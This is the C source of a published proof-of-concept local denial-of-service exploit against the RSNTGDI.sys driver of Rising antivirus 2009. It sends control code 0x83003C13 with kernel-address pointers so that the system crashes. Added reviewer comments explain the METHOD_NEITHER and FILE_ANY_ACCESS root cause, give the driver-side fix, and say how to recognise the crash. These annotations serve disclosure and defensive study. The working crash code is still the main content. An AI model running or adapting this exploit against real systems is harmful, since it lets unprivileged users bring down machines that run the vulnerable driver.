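/*
 * A bug in this driver has already been published on the net for
 * CONTROL CODE 0x83003C0B, so I checked the other control codes in the
 * same file. Just for fun.....
 *
 * # Exploit Title: [Rising RSNTGDI.sys Local Denial of Service(CONTROL CODE:83003C13) ]
 * # Date: [2010.11.1]
 * # Author: [ ze0r ]
 * # Version: [Rising 2009.Publish Date:2009.10.13.]
 * # Tested on: [Windows XPSP3 Chinese Simplified & Windows 2003 Chinese Simplified]
 *
 * Reviewer notes (root cause and mitigation):
 *
 * - Under the CTL_CODE layout, 0x83003C13 decodes to device type 0x8300,
 *   required access FILE_ANY_ACCESS (bits 15-14 are 0), function 0xF04 and
 *   transfer method METHOD_NEITHER (low two bits are 3). With METHOD_NEITHER
 *   the I/O manager passes the caller's input and output pointers to the
 *   driver as-is, neither probed nor copied, so every check is the driver's
 *   job.
 * - FILE_ANY_ACCESS means the request is accepted on a handle opened with
 *   no access rights at all, which is exactly how main() opens the device.
 * - The driver's code is not part of this listing. Presumably its handler
 *   for this code dereferences the supplied pointers without validating
 *   them; confirm against a crash dump or the vendor's fix.
 * - Driver-side fix: validate both pointers with ProbeForRead /
 *   ProbeForWrite inside __try/__except and work on a captured copy, or
 *   move the request to METHOD_BUFFERED; require read/write access in the
 *   IOCTL definition; give the device object a restrictive security
 *   descriptor so unprivileged processes cannot open it.
 * - Triage: a bugcheck caused by this request would be expected to show
 *   rsntgdi.sys on the faulting stack with 0x88888888 as the referenced
 *   address (inferred from the arguments below, not shown on this page).
 */
#include <stdio.h>
#include <windows.h>

/* Handle to the \\.\rsntgdi device; set by main() and read by boom(). */
HANDLE DriverHandle = NULL;

/*
 * Sends control code 0x83003C13 to the device behind DriverHandle.
 *
 * systembuffer is passed as the input buffer and userbuffer as the output
 * buffer, each with a declared length of 20 bytes. Because the code uses
 * METHOD_NEITHER, the driver receives both pointer values unmodified.
 *
 * If the call returns at all (for example on a build where the driver
 * rejects the request), the outcome is printed so a fix can be verified.
 */
void boom(PVOID systembuffer, PVOID userbuffer)
{
    /*
     * The Win32 documentation requires lpBytesReturned to be non-NULL when
     * lpOverlapped is NULL; the original passed NULL for both.
     */
    DWORD bytes_returned = 0;
    BOOL ok;

    printf("userbuffer Is:%p\n\n", userbuffer);
    printf("The systembuffer Is:%p\n\n", systembuffer);

    ok = DeviceIoControl(DriverHandle,
                         0x83003C13,
                         systembuffer,
                         20,
                         userbuffer,
                         20,
                         &bytes_returned,
                         NULL);

    /* The original ignored the result; report it instead. */
    if (!ok) {
        printf("DeviceIoControl failed, error %lu\n\n", GetLastError());
    } else {
        printf("DeviceIoControl returned %lu bytes\n\n", bytes_returned);
    }
}

/*
 * Opens the \\.\rsntgdi device with no requested access rights, waits for a
 * key press, then issues the request through boom().
 *
 * Returns 0 after the request has been sent and 1 if the device could not
 * be opened (the original returned 0 in both cases, so a failed open was
 * indistinguishable from a completed run).
 */
int main(int argc, char* argv[])
{
    (void)argc;
    (void)argv;

    printf("-------------------------------------------------------------------------------\n");
    printf("---------------------------C0ed By:ze0r,Let's ROCK!!---------------------------\n");
    printf("----------------------------------QQ:289791332---------------------------------\n");
    printf("-------------------------------------------------------------------------------\n\n");

    /* dwDesiredAccess is 0: the control code is FILE_ANY_ACCESS, so no rights are needed. */
    DriverHandle = CreateFile("\\\\.\\rsntgdi",
                              0,
                              FILE_SHARE_READ | FILE_SHARE_WRITE,
                              NULL,
                              OPEN_EXISTING,
                              0,
                              NULL);
    if (DriverHandle == INVALID_HANDLE_VALUE) {
        printf("Open Driver Error!\n\n");
        return 1;
    }

    printf("OK.Let's Crash It!\n\n");
    getchar();

    /*
     * 0x88888888 is above 0x80000000, i.e. in the kernel half of the address
     * space on 32-bit Windows with the default split; a handler that probed
     * its pointers would reject it.
     */
    boom((PVOID)0x88888888, (PVOID)0x88888888);

    /* The original never released the device handle. */
    CloseHandle(DriverHandle);
    DriverHandle = NULL;
    return 0;
}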